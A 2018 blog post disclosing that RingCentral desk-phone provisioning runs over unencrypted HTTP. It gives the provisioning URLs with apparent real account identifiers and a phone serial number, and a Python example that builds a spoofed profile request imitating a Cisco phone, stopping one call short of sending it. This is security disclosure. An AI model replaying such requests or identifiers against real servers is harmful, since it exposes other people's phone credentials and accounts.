Wednesday, August 22, 2018

RingCentral phone provisioning is insecure


Recently I provisioned a Cisco SPA-525G2 desk phone on my RingCentral free trial account and found that their provisioning process is not secure at all.

When I added an existing phone on the account admin portal, it prompted me to enter the IP address of my IP desk phone. I was curious how the flow works underneath, so I dug into it and found that RingCentral uses HTTP instead of HTTPS. It provides neither a server-side certificate nor a client-side certificate, so there is no TLS at all, let alone mutual TLS authentication. This means the provisioning traffic is exposed to anyone who can see the network path, and any device that knows the URL can get provisioned through their provisioning portal. I was very surprised by their design from a security perspective.

Phone resync URL (sent to the phone's admin interface; everything after the "?" is the profile URL the phone is told to fetch):
http://10.100.61.87/admin/resync?http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=$SN&pn=$PN

The phone then fetches its profile from their provisioning portal over plain HTTP:
http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=$SN&pn=$PN

The $SN and $PN variables in the URL are replaced by the desk phone with its serial number and product model before the request is sent:
http://service.ringcentral.com/op/?u=1953899020&ai=803497337020&sn=CCQ214808CZ&pn=SPA525G2

If you sniff the network, you can clearly see the request and response in clear text (including the user ID, password, auth ID and other settings in a plain XML file), and you can use any HTTP client with any user agent to do the provisioning while posing as a Cisco IP phone.
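The flow above, walked through offline as an added example (this is not RingCentral's or Cisco's code). The URL template, IP address, serial number and model are the values from this post; the macro expansion is a literal string substitution, which is what the phone is observed to do; the audit checks are this example's own heuristics for what a reviewer would flag, and the https URL used for contrast is a made-up placeholder, not a real RingCentral endpoint. The request is built but never sent.

```python
"""Reconstruct the RingCentral phone-provisioning flow described in the post.

Added example, not vendor code. Values marked "from the post" are taken from
the blog text; everything else is this example's own assumption.
"""
from urllib.parse import urlsplit, parse_qs
from urllib.request import Request

# From the post: the phone's address and the profile rule the portal pushes to it.
PHONE_IP = "10.100.61.87"
PROFILE_RULE = ("http://service.ringcentral.com/op/"
                "?u=1953899020&ai=803497337020&sn=$SN&pn=$PN")
SERIAL = "CCQ214808CZ"   # from the post
MODEL = "SPA525G2"       # from the post


def build_resync_url(phone_ip: str, profile_rule: str) -> str:
    """Form the admin resync URL: everything after '?' is the profile the phone must fetch."""
    return f"http://{phone_ip}/admin/resync?{profile_rule}"


def expand_phone_macros(profile_rule: str, serial: str, model: str) -> str:
    """Substitute $SN / $PN the way the phone does before it requests its profile."""
    return profile_rule.replace("$SN", serial).replace("$PN", model)


def audit_profile_rule(profile_rule: str) -> list:
    """Return the weaknesses a reviewer would flag in a provisioning URL (heuristics, assumed)."""
    parts = urlsplit(profile_rule)
    findings = []
    if parts.scheme != "https":
        findings.append("profile fetched over cleartext HTTP: "
                        "credentials in the reply can be sniffed")
    query = parse_qs(parts.query)
    # The account identifiers in the query string are the only thing gating the
    # profile download, so anyone who sees the URL can replay it from any client.
    for name in ("u", "ai"):
        if name in query:
            findings.append(f"account identifier '{name}' travels in the URL "
                            "and acts as a bearer secret")
    return findings


def build_profile_request(url: str, user_agent: str) -> Request:
    """Build (do not send) the GET any HTTP client can issue while posing as the phone."""
    req = Request(url, method="GET")
    req.add_header("User-Agent", user_agent)  # nothing server-side verifies this
    return req


if __name__ == "__main__":
    print("resync URL :", build_resync_url(PHONE_IP, PROFILE_RULE))
    fetched = expand_phone_macros(PROFILE_RULE, SERIAL, MODEL)
    print("phone fetches:", fetched)
    for finding in audit_profile_rule(PROFILE_RULE):
        print("finding    :", finding)
    req = build_profile_request(fetched, "Cisco/SPA525G2")  # assumed UA string
    print("spoofed request:", req.get_method(), req.full_url, req.header_items())
```

Passing the built request to urllib.request.urlopen would reproduce the download the post describes from an ordinary laptop rather than the phone; the script stops short of that so it runs offline.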

This worries me about their overall security design. I am not sure whether it was designed this way on purpose or by mistake.
